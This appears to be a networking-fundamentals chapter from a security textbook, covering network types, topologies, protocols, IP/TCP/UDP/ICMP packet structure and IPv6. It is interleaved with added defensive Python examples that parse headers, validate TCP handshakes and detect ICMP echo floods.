Every network has an architecture—whether by design or by accident. Defining or describing a specific network's architecture involves identifying the network's physical configuration, logical operation, structure, procedures, data formats, protocols, and other components. For the sake of simplicity and categorization, people tend to divide network architectures into two main categories: LANs and WANs. A local area network (LAN) typically is smaller in terms of size and geographic coverage and consists of two or more connected devices. Home networks and most small office networks can be classified as LANs. A wide area network (WAN) tends to be larger, covering more geographic area, and consists of two or more systems in geographically separated areas connected by any of a variety of methods such as leased lines, radio waves, satellite relays, microwaves, or even dial-up connections. With the advent of wireless networking, optical, and cellular technology, the lines between LAN and WAN sometimes seem to merge seamlessly into a single network entity. For example, most corporations have multiple LANs within each office location that all connect to a WAN that provides intercompany connectivity. Figure 9.1 shows an example of a corporate network. Each office location will typically have one or more LANs, which are connected to the other offices and the company headquarters through a corporate WAN.
• Figure 9.1 Corporate WAN connecting multiple offices
Exam Tip: A LAN is a local area network—an office building, home network, and so on. A WAN is a wide area network—a corporate network connecting offices in Dallas, New York, and San Jose, for example.
Over time, as networks have grown, diversified, and multiplied, the line between LAN and WAN has become blurred. To better describe emerging, specialized network structures, new terms have been coined to classify networks based on size and use:
Campus area network (CAN) A network connecting any number of buildings in an office or university complex (also referred to as a campus wide area network).
Intranet A "private" network that is accessible only to authorized users. Many large corporations host an intranet to facilitate information sharing within their organization.
Internet The "global network" connecting hundreds of millions of systems and users.
Metropolitan area network (MAN) A network designed for a specific geographic locality such as a town or a city.
Storage area network (SAN) A high-speed network connecting a variety of storage devices such as tape systems, RAID arrays, optical drives, file servers, and others.
Virtual local area network (VLAN) A logical network allowing systems on different physical networks to interact as if they were connected to the same physical network.
Client/server A network in which powerful, dedicated systems called servers provide resources to individual workstations or clients.
Peer-to-peer A network in which every system is treated as an equal, such as a home network.
Network Topology
One major component of every network's architecture is the network's topology—how the network is physically or logically arranged. Terms to classify a network's topology have been developed, often reflecting the physical layout of the network. The main classes of network topologies are star, ring, bus, and mixed.
Star topology Network components are connected to a central point. (See Figure 9.2.)
• Figure 9.2 Star topology
Bus topology Network components are connected to the same cable, often called "the bus" or "the backbone." (See Figure 9.3.)
• Figure 9.3 Bus topology
Ring topology Network components are connected to each other in a closed loop with each device directly connected to two other devices. (See Figure 9.4.)
• Figure 9.4 Ring topology
Larger networks, such as those inside an office complex, may use more than one topology at the same time. For example, an office complex may have a large ring topology that interconnects all the buildings in the complex. Each building may have a large bus topology to interconnect star topologies located on each floor of the building. This is called a mixed topology or hybrid topology. (See Figure 9.5.)
• Figure 9.5 Mixed topology
With recent advances in technology, these topology definitions often break down. While a network consisting of five computers connected to the same coaxial cable is easily classified as a bus topology, what about those same computers connected to a switch using Cat-5 cables? With a switch, each computer is connected to a central node, much like a star topology, but the backplane of the switch is essentially a shared medium.
With a switch, each computer has its own exclusive connection to the switch like a star topology, but has to share the switch's communications backbone with all the other computers, much like a bus topology. To avoid this type of confusion, many people use topology definitions only to identify the physical layout of the network, focusing on how the devices are connected to the network. If we apply this line of thinking to our example, the five-computer network becomes a star topology whether we use a hub or a switch.
Wireless networks use radio waves as their medium to transmit packets, and those radio waves don't stop at the walls of your house or your organization. Anyone within range can "see" those radio waves and attempt to either sniff your traffic or connect to your network. Encryption, MAC address filtering, and suppression of beacon frames are all security mechanisms to consider when using wireless networks. Wireless networks, because of the signal propagation, can easily assume a mesh structure.
Network Protocols
How do all these interconnected devices communicate? What makes a PC in China able to view web pages on a server in Brazil? When engineers first started to connect computers together via networks, they quickly realized they needed a commonly accepted method for communicating—a protocol.
Protocols
A protocol is an agreed-upon format for exchanging or transmitting data between systems. A protocol defines a number of agreed-upon parameters, such as the data compression method, the type of error checking to use, and mechanisms for systems to signal when they have finished either receiving or transmitting data. There is a wide variety of protocols, each designed with certain benefits and uses in mind. Some of the more common protocols that have been used in networking are listed next. Today, most networks are dominated by Ethernet and Internet Protocol.
AppleTalk The communications protocol developed by Apple to connect Macintosh computers and printers.
Asynchronous Transfer Mode (ATM) A protocol based on transferring data in fixed-size packets. The fixed packet sizes help ensure that no single data type monopolizes the available bandwidth.
Ethernet The LAN protocol developed jointly by Xerox, DEC, and Intel—the most widely implemented LAN standard.
Fiber Distributed Data Interface (FDDI) The protocol for sending digital data over fiber-optic cabling.
Internet Protocols (IP) The protocols for managing and transmitting data between packet-switched computer networks, originally developed for the Department of Defense. Most users are familiar with Internet protocols such as e-mail, File Transfer Protocol (FTP), Telnet, and Hypertext Transfer Protocol (HTTP).
Internetwork Packet Exchange (IPX) The networking protocol created by Novell for use with Novell NetWare operating systems.
Signaling System 7 (SS7) The telecommunications protocol used between private branch exchanges (PBXs) to handle tasks such as call setup, routing, and teardown.
Systems Network Architecture (SNA) A set of network protocols developed by IBM, originally used to connect IBM's mainframe systems.
Token Ring A LAN protocol developed by IBM that requires systems to possess the network "token" before transmitting data.
Transmission Control Protocol/Internet Protocol (TCP/IP) The collection of communications protocols used to connect hosts on the Internet. TCP/IP is by far the most commonly used network protocol and is a combination of the TCP and IP protocols.
X.25 A protocol developed by the Comité Consultatif International Téléphonique et Télégraphique (CCITT) for use in packet-switched networks. The CCITT was a subgroup within the International Telecommunication Union (ITU) before the CCITT was disbanded in 1992.
A little history on the IP protocol from Wikipedia: "In May, 1974, the Institute of Electrical and Electronic Engineers (IEEE) published a paper entitled 'A Protocol for Packet Network Interconnection.' The paper's authors, Vint Cerf and Bob Kahn, described an internetworking protocol for sharing resources using packet-switching among the nodes."
In most cases, communications protocols were developed around the Open System Interconnection (OSI) model. The OSI model, or OSI Reference Model, is an International Organization for Standardization (ISO) standard for worldwide communications that defines a framework for implementing protocols and networking components in seven distinct layers. Within the OSI model, control is passed from one layer to another (top-down) before it exits one system and enters another system, where control is passed bottom-up to complete the communications cycle. It is important to note that most protocols only loosely follow the OSI model; several protocols combine one or more layers into a single function. The OSI model also provides a certain level of abstraction and isolation for each layer, which only needs to know how to interact with the layer above and below it. The application layer, for example, only needs to know how to communicate with the presentation layer—it does not need to talk directly to the physical layer. Figure 9.6 shows the different layers of the OSI model.
• Figure 9.6 The OSI Reference Model
Packets
Networks are built to share information and resources, but like other forms of communication, networks and the protocols they use have limits and rules that must be followed for effective communication. For example, large chunks of data must typically be broken up into smaller, more manageable chunks before they are transmitted from one computer to another. Breaking the data up has advantages—you can more effectively share bandwidth with other systems and you don't have to retransmit the entire data set if there is a problem in transmission. When data is broken up into smaller pieces for transmission, each of the smaller pieces is typically called a packet. Each protocol has its own definition of a packet—dictating how much data can be carried, what information is stored where, how the packet should be interpreted by another system, and so on.
The concept of breaking a message into pieces before sending it is as old as networking. The terms used to describe these pieces can vary from protocol to protocol. Frame Relay and Ethernet both use the term frame. ATM calls them cells. Many protocols use the generic term packet. In the OSI model, the term datagram is used. At the end of the day, regardless of what it is called, these pieces are protocol-defined, formatted structures used to carry information.
A standard packet structure is a crucial element in a protocol definition. Without a standard packet structure, systems would not be able to interpret the information coming to them from other systems. Packet-based communication systems have other unique characteristics, such as size, which need to be addressed. This is done via a defined maximum and fragmenting packets that are too big, as shown in the next sections.
Maximum Transmission Unit
When transmitting packets across a network, there are many intervening protocols and pieces of equipment, each with its own set of limitations. One of the factors used to determine how many packets a message must be broken into is the Maximum Transmission Unit (MTU). The MTU is the largest packet that can be carried across a network channel. The value of the MTU is used by TCP to prevent packet fragmentation at intervening devices. Packet fragmentation is the splitting of a packet while in transit into two packets so that they fit past an MTU bottleneck.
Packet Fragmentation
Built into the Internet Protocol is a mechanism for handling of packets that are larger than allowed across a hop. Under ICMPv4, a router has two options when it encounters a packet that is too large for the next hop: break the packet into two fragments, sending each separately, or drop the packet and send an ICMP message back to the originator, indicating that the packet is too big. When a fragmented packet arrives at the receiving host, it must be reunited with the other packet fragments and reassembled. One of the problems with fragmentation is that it can cause excessive levels of packet retransmission as TCP must retransmit an entire packet for the loss of a single fragment. In IPv6, to avoid fragmentation, hosts are required to determine the minimal path MTU before transmission of packets to avoid fragmentation en route. Any fragmentation requirements in IPv6 are resolved at the origin, and if fragmentation is required, it occurs before sending.
Tech Tip
IPv6 and Fragmentation
IPv6 systems calculate the MTU and then adhere to that from host to host. This prevents fragmentation en route; instead all fragmentation is done by the originating host to fit under the MTU limit.
IP fragmentation can be exploited in a variety of ways to bypass security measures. Packets can be purposefully constructed to split exploit code into multiple fragments to avoid IDS detection. Because the reassembly of fragments is dependent upon data in the fragments, it is possible to manipulate the fragments to result in datagrams that exceed the 64KB limit, resulting in denial of service.
Internet Protocol
The Internet Protocol is not a single protocol but a suite of protocols. The relationship between some of the IP suite and the OSI model is shown in Figure 9.7. As you can see, there are differences between the two versions of the protocol in use, v4 and v6. The protocol elements and their security implications are covered in the next sections of this chapter. One of these differences is the replacement of the Internet Group Management Protocol (IGMP) with the Internet Control Message Protocol (ICMP) and Multicast Listener Discovery (MLD) in IPv6.
• Figure 9.7 Internet Protocol suite components
IP Packets
To better understand packet structure, let's examine the packet structure defined by the IP protocol. An IP packet, often called a datagram, has two main sections: the header and the data section (sometimes called the payload). The header section contains all of the information needed to describe the packet (see Figure 9.8).
• Figure 9.8 Logical layout of an IP packet, (a) IPv4 (b) IPv6
In IPv4, there are common fields to describe the following options.
What kind of packet it is (protocol version number)
How large the header of the packet is (packet header length)
How to process this packet (type of service telling the network whether or not to use options such as minimize delay, maximize throughput, maximize reliability, and minimize cost)
How large the entire packet is (overall length of packet—since this is a 16-bit field, the maximum size of an IP packet is 65,535 bytes, but in practice most packets are around 1500 bytes)
A unique identifier so that this packet can be distinguished from other packets
Whether or not this packet is part of a longer data stream and should be handled relative to other packets
Flags that indicate whether or not special handling of this packet is necessary
A description of where this packet fits into the data stream as compared to other packets (the fragment offset)
A "time to live" field that indicates the packet should be discarded if the value is zero
A protocol field that describes the encapsulated protocol
A checksum of the packet header (to minimize the potential for data corruption during transmission)
Where the packet is from (source IP address, such as 10.10.10.5)
Where the packet is going (destination IP address, such as 10.10.10.10)
Option flags that govern security and handling restrictions, whether or not to record the route this packet has taken, whether or not to record timestamps, and so on
The data this packet carries
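The header fields just listed, together with the fragment reassembly problem described under Packet Fragmentation, as a worked example added here (not code from the book): a parser for the IPv4 header that verifies the header checksum, and a check that no fragment of a datagram would extend past the 65,535-byte limit. The packet bytes are constructed, and the helper names are this example's own.

```python
import struct
from dataclasses import dataclass

IPV4_MAX_DATAGRAM = 65535   # 16-bit total-length field, as noted above


@dataclass
class IPv4Header:
    """The header fields listed above, decoded from the wire format."""
    version: int
    ihl_bytes: int          # header length in bytes (IHL field * 4)
    tos: int                # type of service
    total_length: int
    identification: int
    dont_fragment: bool
    more_fragments: bool
    fragment_offset: int    # in bytes (13-bit field value * 8)
    ttl: int
    protocol: int           # encapsulated protocol (1 = ICMP, 6 = TCP, 17 = UDP)
    checksum_ok: bool
    src: str
    dst: str


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum of 16-bit words (RFC 1071); caller zeroes the checksum field."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_header(packet: bytes) -> IPv4Header:
    """Decode the IPv4 header from raw packet bytes and verify its checksum."""
    if len(packet) < 20:
        raise ValueError("too short for an IPv4 header")
    ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, csum = struct.unpack(
        "!BBHHHBBH", packet[:12])
    version = ver_ihl >> 4
    ihl_bytes = (ver_ihl & 0x0F) * 4
    if version != 4 or ihl_bytes < 20 or len(packet) < ihl_bytes:
        raise ValueError("not a well-formed IPv4 header")
    # Recompute the checksum over the header with the checksum field zeroed.
    zeroed = packet[:10] + b"\x00\x00" + packet[12:ihl_bytes]
    return IPv4Header(
        version=version, ihl_bytes=ihl_bytes, tos=tos, total_length=total_len,
        identification=ident,
        dont_fragment=bool(flags_frag & 0x4000),
        more_fragments=bool(flags_frag & 0x2000),
        fragment_offset=(flags_frag & 0x1FFF) * 8,
        ttl=ttl, protocol=proto,
        checksum_ok=ipv4_checksum(zeroed) == csum,
        src=".".join(str(b) for b in packet[12:16]),
        dst=".".join(str(b) for b in packet[16:20]),
    )


def build_ipv4_header(src: str, dst: str, payload_len: int, ident: int = 0,
                      offset: int = 0, more: bool = False, proto: int = 17,
                      ttl: int = 64) -> bytes:
    """Build a constructed 20-byte header (sample input for the parser, not real traffic)."""
    flags_frag = (0x2000 if more else 0) | ((offset // 8) & 0x1FFF)
    addrs = bytes(int(x) for x in src.split(".")) + bytes(int(x) for x in dst.split("."))
    hdr = struct.pack("!BBHHHBBH", 0x45, 0, 20 + payload_len, ident, flags_frag,
                      ttl, proto, 0) + addrs
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]


def reassembly_is_safe(fragments) -> bool:
    """Return False if any fragment of one datagram would extend past 65,535 bytes.

    A receiver that trusts offset and length blindly can be driven to write
    beyond the maximum datagram size, the denial-of-service case described
    above; checking each fragment before buffering it avoids that.
    """
    for h in fragments:
        payload_len = h.total_length - h.ihl_bytes
        if h.fragment_offset + payload_len > IPV4_MAX_DATAGRAM:
            return False
    return True
```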
In IPv6, the source and destination addresses take up much greater room, and for equipment and packet handling reasons, most of the informational options have been moved to the optional area after the addresses. This series of optional extension headers allows the efficient use of the header in processing the routing information during packet routing operations. One of the most common options is the IPsec extension, which is used to establish IPsec connections. IPsec uses encryption to provide a variety of protections to packets. IPsec is fully covered in Chapter 11.
Tech Tip
The Importance of Understanding TCP/IP Protocols
A security professional must understand how the various TCP/IP protocols operate. For example, if you're looking at a packet capture of a suspected port scan, you need to know how "normal" TCP and UDP traffic works so you will be able to spot "abnormal" traffic. This chapter provides a very basic overview of the most popular protocols: TCP, UDP, and ICMP.
As you can see, this standard packet definition allows systems to communicate. Without this type of "common language," the global connectivity we enjoy today would be impossible—the IP protocol is the primary means for transmitting information across the Internet.
TCP vs. UDP
Protocols are typically developed to enable a certain type of communication or solve a specific problem. Over the years, this approach has led to the development of many different protocols, each critical to the function or process it supports. However, there are two protocols that have grown so much in popularity and use that without them, the Internet as we know it would cease to exist. These two protocols, the Transmission Control Protocol (TCP) and User Datagram Protocol (UDP), are protocols that run on top of the IP network protocol. As separate protocols, they each have their own packet definitions, capabilities, and advantages, but the most important difference between TCP and UDP is the concept of "guaranteed" reliability and delivery.
Exam Tip: TCP is a "connection-oriented" protocol and offers reliability and guaranteed delivery of packets. UDP is a "connectionless" protocol with no guarantees of delivery.
UDP is known as a "connectionless" protocol as it has very few error-recovery services and no guarantee of packet delivery. With UDP, packets are created and sent on their way. The sender has no idea whether the packets were successfully received or whether they were received in order. In that respect, UDP packets are much like postcards—you address them and drop them in the mailbox, not really knowing if, when, or how the postcards reach your intended audience. Even though packet loss and corruption are relatively rare on modern networks, UDP is considered to be an unreliable protocol and is often only used for network services that are not greatly affected by the occasional lost or dropped packet. Time synchronization requests, name lookups, and streaming audio are good examples of network services based on UDP. UDP also happens to be a fairly "efficient" protocol in terms of content delivery versus overhead. With UDP, more time and space is dedicated to content (data) delivery than with other protocols such as TCP. This makes UDP a good candidate for streaming protocols, as more of the available bandwidth and resources are used for data delivery than with other protocols.
TCP is a "connection-oriented" protocol and was specifically designed to provide a reliable connection between two hosts exchanging data. TCP was also designed to ensure that packets are processed in the same order in which they were sent. As part of TCP, each packet has a sequence number to show where that packet fits into the overall conversation. With the sequence numbers, packets can arrive in any order and at different times and the receiving system will still know the correct order for processing them. The sequence numbers also let the receiving system know if packets are missing—receiving packets 1, 2, 4, and 7 tells us that packets 3, 5, and 6 are missing and needed as part of this conversation. The receiving system can then request retransmission of packets from the sender to fill in any gaps.
The "guaranteed and reliable" aspect of TCP makes it very popular for many network applications and services such as HTTP, FTP, and Telnet. As part of the connection, TCP requires that systems follow a specific pattern when establishing communications. This pattern, often called the three-way handshake (shown in Figure 9.9), is a sequence of very specific steps:
• Figure 9.9 TCP's three-way handshake
1. The originating host (usually called the client) sends a SYN (synchronize) packet to the destination host (usually called the server). The SYN packet tells the server what port the client wants to connect to and the initial packet sequence number of the client.
2. The server sends a SYN/ACK packet back to the client. This SYN/ACK (synchronize/acknowledge) tells the client "I received your request" and also contains the server's initial packet sequence number.
3. The client responds to the server with an ACK packet to complete the connection establishment process.
Think of the three-way handshake as being similar to a phone call. You place a call to your friend—that's the SYN. Your friend answers the phone and says "hello"—that's the SYN/ACK. Then you say "Hi, it's me"—that's the ACK. Your connection is established and you can start your conversation.
ICMP
While TCP and UDP are arguably the most common protocols, the Internet Control Message Protocol (ICMP) is probably the third most commonly used protocol. During the early development of large networks, it was quickly discovered that there needed to be some mechanism for managing the overall infrastructure—handling connection status, traffic flow, availability, and errors. This mechanism is ICMP. ICMP is a control and information protocol and is used by network devices to determine such things as a remote network's availability, the length of time to reach a remote network, and the best route for packets to take when traveling to that remote network (using ICMP redirect messages, for example). ICMP can also be used to handle the flow of traffic, telling other network devices to "slow down" transmission speeds if packets are coming in too fast.
Tech Tip
TCP Packet Flags
TCP packets contain flags—dedicated fields that are used to help the TCP protocol control and manage the TCP session. There are eight different flags in a TCP packet, and when a flag is "set," it is set to a value of 1. The eight different flags are
CWR (Congestion Window Reduced) Set by a host to indicate that it received a packet with the ECE flag set and is taking action to help reduce congestion.
ECE (ECN-Echo) Indicates that the TCP peer is ECN capable when used during the three-way handshake. During normal traffic, this flag means that a packet with a Congestion Experienced flag in its IP header was received by the host sending this packet.
URG (Urgent) When set, the urgent pointer in the packets should be read as valid and followed for additional data.
ACK (Acknowledgment) Indicates that the data in the ACK field should be processed.
PSH (Push) Indicates that data delivery should start immediately rather than waiting for buffers to fill up first.
RST (Reset) Resets the current connection—a start-over feature often used by IPS/IDS devices to interrupt sessions.
SYN (Synchronize) Used to help synchronize sequence numbers.
FIN (Finish) Indicates the sender is finished and has no more data to send.
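The three-way handshake described earlier and the eight flags in this tip, as an added example (not code from the book): a decoder for the flags byte and a check that three captured segments form a consistent SYN, SYN/ACK, ACK exchange, including the "initial sequence number + 1" acknowledgments. The segments, addresses and function names are this example's own.

```python
from typing import List, NamedTuple, Optional

# The eight flag bits of the TCP flags byte, highest bit first: CWR ECE URG ACK PSH RST SYN FIN
FLAG_BITS = {"CWR": 0x80, "ECE": 0x40, "URG": 0x20, "ACK": 0x10,
             "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01}


def decode_flags(flag_byte: int) -> List[str]:
    """Names of the flags that are set (value 1) in the flags byte, CWR first."""
    return [name for name, bit in FLAG_BITS.items() if flag_byte & bit]


class TcpSegment(NamedTuple):
    """Minimal view of one segment: endpoints as "ip:port", raw flags byte, seq and ack."""
    src: str
    dst: str
    flags: int
    seq: int
    ack: int


def check_handshake(segs: List[TcpSegment]) -> Optional[str]:
    """Validate the first three segments as SYN, SYN/ACK, ACK.

    Returns None when the exchange is consistent, otherwise the reason it
    is not. Acknowledgment numbers are checked the way a stateful inspector
    does: the SYN/ACK must acknowledge the client's initial sequence number
    + 1, and the final ACK the server's + 1. ECE and CWR are permitted on
    the SYN, since that is how ECN capability is signalled (see the tip).
    """
    if len(segs) < 3:
        return "incomplete handshake: fewer than three segments"
    syn, synack, ack = segs[:3]
    f1, f2, f3 = (set(decode_flags(s.flags)) for s in (syn, synack, ack))
    if "SYN" not in f1 or f1 & {"ACK", "RST", "FIN"}:
        return "step 1 must carry SYN without ACK, RST or FIN"
    if not {"SYN", "ACK"} <= f2 or f2 & {"RST", "FIN"}:
        return "step 2 must carry SYN and ACK"
    if (synack.src, synack.dst) != (syn.dst, syn.src):
        return "step 2 is not a reply from the server to the client"
    if synack.ack != (syn.seq + 1) & 0xFFFFFFFF:
        return "step 2 does not acknowledge client ISN + 1"
    if "ACK" not in f3 or f3 & {"SYN", "RST", "FIN"}:
        return "step 3 must carry ACK without SYN, RST or FIN"
    if (ack.src, ack.dst) != (syn.src, syn.dst):
        return "step 3 is not from the client to the server"
    if ack.ack != (synack.seq + 1) & 0xFFFFFFFF or ack.seq != (syn.seq + 1) & 0xFFFFFFFF:
        return "step 3 sequence/acknowledgment numbers do not line up"
    return None


# Constructed sample exchange: the "call", "hello", "hi, it's me" of the analogy above.
CLIENT, SERVER = "10.10.10.5:51234", "10.10.10.10:80"
GOOD_HANDSHAKE = [
    TcpSegment(CLIENT, SERVER, FLAG_BITS["SYN"], seq=1000, ack=0),
    TcpSegment(SERVER, CLIENT, FLAG_BITS["SYN"] | FLAG_BITS["ACK"], seq=5000, ack=1001),
    TcpSegment(CLIENT, SERVER, FLAG_BITS["ACK"], seq=1001, ack=5001),
]
```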
ICMP, like UDP, is a connectionless protocol. ICMP was designed to carry small messages quickly with minimal overhead or impact to bandwidth. ICMP packets are sent using the same header structure as IP packets, with the protocol field set to 1 to indicate that it is an ICMP packet. ICMP packets also have their own header, which follows the IP header and contains type, code, checksum, sequence number, identifier, and data fields. The "type" field indicates what type of ICMP message it is, and the "code" field tells us what the message really means. For example, an ICMP packet with a type of 3 and a code of 2 would tell us this is a "destination unreachable" message and, more specifically, a "host unreachable" message—usually indicating that we are unable to communicate with the intended destination. Because ICMP messages in IPv6 can use IPsec, ICMPv6 messages can have significant protections from alteration.
Unfortunately, ICMP has been greatly abused by attackers over the last few years to execute denial-of-service (DoS) attacks. Because ICMP packets are very small and connectionless, thousands and thousands of ICMP packets can be generated by a single system in a very short period of time. Attackers have developed methods to trick many systems into generating thousands of ICMP packets with a common destination—the attacker's target. This creates a literal flood of traffic that the target, and in most cases the network the target sits on, is incapable of dealing with. The ICMP flood drowns out any other legitimate traffic and prevents the target from accomplishing its normal duties—denying access to the service the target normally provides. This has led to many organizations blocking all external ICMP traffic at the perimeter of their organization.
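The ICMP header layout and the flood problem just described, as an added example (not code from the book): a decoder for the ICMP header that rejects a bad checksum, and a per-source rate check that flags echo-request floods instead of blocking ICMP wholesale. The packets, addresses and threshold values are constructed for the example; the type names are the ICMPv4 values from RFC 792.

```python
import struct
from collections import deque

# ICMPv4 type values from RFC 792 for the messages mentioned in the text.
ICMP_TYPE_NAMES = {0: "echo reply", 3: "destination unreachable",
                   8: "echo request", 11: "time exceeded"}


def icmp_checksum(data: bytes) -> int:
    """One's-complement checksum over the whole ICMP message (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(icmp_type: int, ident: int, seq: int, payload: bytes = b"") -> bytes:
    """Constructed echo request (type 8) or reply (type 0) bytes; sample input only."""
    body = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    return body[:2] + struct.pack("!H", icmp_checksum(body)) + body[4:]


def parse_icmp(msg: bytes) -> dict:
    """Decode type, code, checksum, identifier and sequence; reject a bad checksum."""
    if len(msg) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", msg[:8])
    if icmp_checksum(msg[:2] + b"\x00\x00" + msg[4:]) != csum:
        raise ValueError("ICMP checksum mismatch")
    return {"type": icmp_type, "code": code,
            "name": ICMP_TYPE_NAMES.get(icmp_type, "other"),
            "identifier": ident, "sequence": seq, "data": msg[8:]}


def echo_flood_sources(packets, window_s: float = 1.0, threshold: int = 100) -> set:
    """Sources that sent more than `threshold` echo requests within any `window_s` seconds.

    `packets` is a time-ordered iterable of (timestamp, src_ip, icmp_bytes).
    Counting per source over a sliding window is the selective control the
    text contrasts with blocking all ICMP at the perimeter; malformed
    messages are discarded rather than counted.
    """
    recent = {}           # src_ip -> deque of timestamps inside the window
    flagged = set()
    for ts, src, raw in packets:
        try:
            hdr = parse_icmp(raw)
        except ValueError:
            continue
        if hdr["type"] != 8:
            continue
        q = recent.setdefault(src, deque())
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) > threshold:
            flagged.add(src)
    return flagged
```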
Tech Tip
ICMP Message Codes
With ICMP packets, the real message of the packet is contained in the "type and code" fields, not the data field. Following are some of the more commonly seen ICMP type codes. Note that ICMPv6 has broken the listing into two types: error messages (0–127) and informational messages (128–255, presented in the latter half of the table). IPv6 introduces many new protocols, two of which will have significant implications: the Neighbor Discovery Protocol (NDP), which manages the interactions between neighboring IPv6 nodes, and Multicast Listener Discovery (MLD), which manages IPv6 multicast groups.
Tech Tip
Many of the messages have associated code values that make the message more specific. For example, ICMPv4 messages with a type of 3 can have any of the following codes:
Cross Check
Ping Sweep
In Chapter 1 you learned about a "ping sweep." What is a ping sweep and what is it used for? What types of ICMP packets could you use to conduct a ping sweep? How does this differ between ICMPv4 and ICMPv6?
Tech Tip
Should You Block ICMP?
ICMP is a protocol used for troubleshooting, error reporting, and a wide variety of associated functionality. This functionality expands in ICMPv6 into multicasting. ICMP got a bad name primarily because of issues associated with ping and traceroute commands, but these represent a tiny minority of the protocol functionality. There are numerous important uses associated with ICMP, and blocking it in its entirety is a bad practice. Blocking specific commands and specific sources makes sense; blanket blocking is a poor practice that will lead to network inefficiencies. Blocking ICMPv6 in its entirety will block a lot of IPv6 functionality because ICMP is now an integral part of the protocol suite.
IPv4 vs. IPv6
The most common version of IP in use is IPv4, but the release of IPv6, spurred by the depletion of the IPv4 address space, has begun a typical logarithmic adoption curve. IPv6 has many similarities to the previous version, but it also has significant new enhancements, many of which have significant security implications.
Expanded Address Space
The expansion of the address space from 32 bits to 128 bits is a significant change. Where IPv4 did not have enough addresses for each person on earth, IPv6 has over 1500 addresses per square meter of the entire earth's surface. This has one immediate implication: where you could use a scanner to search all addresses for responses in IPv4, doing the same in IPv6 will take significantly longer. A one millisecond scan in IPv4 equates to a 2.5 billion year scan in IPv6. In theory, the 128 bits of IPv6 address space will express 3.4 × 10^38 possible nodes. The IPv6 addressing protocol has been designed to allow for a hierarchical division of the address space into several layers of subnets, to assist in the maintaining of both efficient and logical address allocations. One example is the embedding of the IPv4 address space in the IPv6 space. This also has an intentional effect of simplifying the backbone routing infrastructures by reducing the routing table size.
Tech Tip
IPv6 Top Security Concerns
There are numerous IPv6 security concerns, some technical, some operational. Some of the top security concerns are
Lack of IPv6 security training/education.
Security device bypass via IPv6.
Poor IPv6 security policies.
Address notation makes grepping through logs difficult if not impossible.
IPv6 complexity increases operational challenges for correct deployment.
Neighbor Discovery
IPv6 introduces the Neighbor Discovery Protocol (NDP), which is useful for auto-configuration of networks. NDP can enable a variety of interception and interruption threat modes. A malevolent router can attach itself to a network and reroute or interrupt traffic flows.
Benefits of IPv6
Change is always a difficult task, and when the change will touch virtually everything in your system, this makes it even more difficult. Changing from IPv4 to IPv6 is not a simple task, for it will have an effect on every networked resource. The good news is that this is not a sudden or surprise process; vendors have been making products IPv6 capable for almost a decade. By this point, virtually all the network equipment you rely upon will be dual-stack capable, meaning that they can operate in both IPv4 and IPv6 networks. This provides a method for an orderly transfer from IPv4 to IPv6. IPv6 has many useful benefits and ultimately will be more secure because it has many security features built into the base protocol series. IPv6 has a simplified packet header and new addressing scheme. This can lead to more efficient routing through smaller routing tables and faster packet processing. IPv6 was designed to incorporate multicasting flows natively, which allows bandwidth-intensive multimedia streams to be sent simultaneously to multiple destinations. IPv6 has a host of new services, from auto-configuration to mobile device addressing, and service enhancements to improve the robustness of QoS and VoIP functions. The security model of IPv6 is baked into the protocol, and is significantly enhanced from the nonexistent one in IPv4. IPv6 is designed to be secure from sender to receiver, with IPsec available natively across the protocol. This will significantly improve communication level security, but it has also drawn a lot of attention. The use of IPsec will change the way security functions are performed across the enterprise. Old IPv4 methods, such as NAT and packet inspection methods of IDS, will need to be adjusted to the new model. Security appliances will have to adapt to the new protocol and its enhanced nature.
Packet Delivery
Protocols are designed to help information get from one place to another, but in order to deliver a packet we have to know where it is going. Packet delivery can be divided into two sections: local and remote. Ethernet is common for local delivery, while IP works for remote delivery. Local packet delivery applies to packets being sent out on a local network, while remote packet delivery applies to packets being delivered to a remote system, such as across the Internet. Ultimately, packets may follow a local delivery–remote delivery–local delivery pattern before reaching their intended destination. The biggest difference in local versus remote delivery is how packets are addressed. Network systems have addresses, not unlike office numbers or street addresses, and before a packet can be successfully delivered, the sender needs to know the address of the destination system.
Tech Tip
MAC Addresses
Every network device should have a unique MAC address. Manufacturers of network cards and network chipsets have blocks of MAC addresses assigned to them, so you can often tell what type of equipment is sending packets by looking at the first three pairs of hexadecimal digits in a MAC address. For example "00-00-0C" would indicate the network device was built by Cisco Systems.
Ethernet
Ethernet is the most widely implemented Layer 2 protocol. Ethernet is standardized under IEEE 802.3. Ethernet works by forwarding packets on a hop-to-hop basis using MAC addresses. Layer 2 addressing can have numerous security implications. Layer 2 addresses can be poisoned, spanning tree algorithms can be attacked, VLANs can be hopped, and more. Because of its near ubiquity, Ethernet is a common attack vector. It has many elements that make it useful from a networking point of view, such as its broadcast nature and its ability to run over a wide range of media. But these can also act against security concerns. Wireless connections are frequently considered to be weak from a security point of view, but so should Ethernet, for unless you own the network, you should consider the network to be at risk.
Local Packet Delivery
Packets delivered on a network, such as an office LAN, are usually sent using the destination system's hardware address, or Media Access Control (MAC) address. Each network card or network device is supposed to have a unique hardware address so that it can be specifically addressed for network traffic. MAC addresses are assigned to a device or network card by the manufacturer, and each manufacturer is assigned a specific block of MAC addresses to prevent two devices from sharing the same MAC address. MAC addresses are usually expressed as six pairs of hexadecimal digits, such as 00:07:e9:7c:c8:aa. In order for a system to send data to another system on the network, it must first find out the destination system's MAC address.
Try This!
Finding MAC Addresses on Windows Systems
Open a command prompt on a Windows system. Type the command ipconfig /all and find your system's MAC address. Hint: It should be listed under "Physical Address" on your network adapters. Now type the command arp –a and press ENTER. What information does this display? Can you find the MAC address of your default gateway?
